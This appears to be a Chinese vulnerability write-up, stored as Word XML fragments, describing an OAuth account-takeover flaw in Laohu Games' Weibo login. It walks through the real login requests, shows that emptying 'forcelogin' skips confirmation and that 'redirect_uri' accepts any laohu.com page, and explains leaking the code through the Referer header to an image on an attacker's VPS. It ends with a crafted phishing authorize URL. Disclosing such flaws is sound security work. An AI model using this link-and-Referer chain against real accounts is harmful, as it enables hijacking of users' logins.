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## </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>老虎游戏之点了我的链接就能登你的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来看正确的登录流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进入微博登录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pi.weibo.com/oauth2/authorize?client_id=13768142&amp;forcelogin=true&amp;response_type=code&amp;redirect_uri=https://i.laohu.com/weiboLogin?location=aHR0cHM6Ly9pLmxhb2h1LmNvbS91c2VyL2hvbWU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拿着用户名取公钥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login.sina.com.cn/sso/prelogin.php?entry=openapi&amp;callback=sinaSSOController.preloginCallBack&amp;su=MTc3OTI1MTQ1ODE%3D&amp;rsakt=mod&amp;client=ssologin.js(v1.4.18)&amp;_=1564624259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OST</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>发送账号密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login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.18)&amp;_=1564624259491&amp;openapilogin=q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输出二维码等待用户扫码登录确认，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>v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pi.weibo.com/oauth2/qrcode_authorize/generate?client_id=13768142&amp;redirect_uri=https%3A%2F%2Fi.laohu.com%2FweiboLogin%3Flocation%3DaHR0cHM6Ly9pLmxhb2h1LmNvbS91c2VyL2hvbWU%3D&amp;scope=&amp;response_type=code&amp;state=&amp;__rnd=1564624259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向服务器发送</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vcode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>返回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pi.weibo.com/oauth2/qrcode_authorize/query?vcode=0db021c373139b01169b24c4734396a9&amp;__rnd=1564630125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ost</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求发送</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>v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pen.weibo.cn/oauth2/qrcode_auth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服务端确认了</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vcode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，返回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"status":"3","url":"https://i.laohu.com/weiboLogin?location=aHR0cHM6Ly9pLmxhb2h1LmNvbS91c2VyL2hvbWU=&amp;code=a6cb4b3386dae15af6ab5576b61d401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拿着</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>去请求老虎游戏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i.laohu.com/weiboLogin?location=aHR0cHM6Ly9pLmxhb2h1LmNvbS91c2VyL2hvbWU=&amp;code=a6cb4b3386dae15af6ab5576b61d401a  ---302</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跳转</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>---&gt; https://i.laohu.com/user/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首先得获取</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vcode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，然后发送</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求，才能获取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但是！这里的第一步的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>`forcelogin`</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以绕过后期复杂操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进入微博登录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pi.weibo.com/oauth2/authorize?client_id=13768142&amp;forcelogin=&amp;response_type=code&amp;redirect_uri=https://i.laohu.com/weiboLogin?location=aHR0cDovL2Jicy5sYW9odS5jb20vZm9ydW0ucG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验证微博</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,302</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跳转到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i.laohu.com/weiboLogin?location=aHR0cDovL2Jicy5sYW9odS5jb20vZm9ydW0ucGhw&amp;state=6297C493AA6A7A5A5EB7DB9B4812758D&amp;code=6a5fe7347c585286a8b1214d934b2e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-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,302</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跳转到，成功登录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bbs.laohu.com/foru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经测试</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>这里第一步的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>`redirect_uri`</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以为</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>laohu.com</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>下的任意地址并生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在</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>`http://bbs.laohu.com/thread-1075541-1-1.html`</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>发布</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VPS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>地址的图片，能够获取用户</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Ref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所以综上述，将</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>钓鱼地址改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pi.weibo.com/oauth2/authorize?client_id=13768142&amp;forcelogin=&amp;response_type=code&amp;redirect_uri=http://bbs.laohu.com/thread-1075541-1-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登录过微博的用户点击后，就会带着</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跳转到帖子地址，就能通过</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>referer</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。拿着获取到的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以直接登录账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效果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